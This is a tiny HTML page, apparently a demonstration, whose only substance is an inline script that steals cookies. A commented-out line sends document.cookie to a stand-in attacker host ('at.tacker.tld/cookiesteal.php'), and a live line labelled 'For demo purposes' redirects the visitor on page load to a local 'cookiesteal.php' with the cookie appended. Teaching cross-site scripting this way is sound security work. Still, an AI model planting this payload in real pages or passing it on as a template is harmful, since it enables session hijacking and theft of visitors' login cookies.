<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Leeg document</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>

<body>
Hello world!

<script>
// Relay cookies stored in 'document' to remote site:
//document.location = 'http://at.tacker.tld/cookiesteal.php?' + document.cookie;
// For demo purposes:
document.location = 'cookiesteal.php?' + document.cookie;
</script>
</body>

</html>
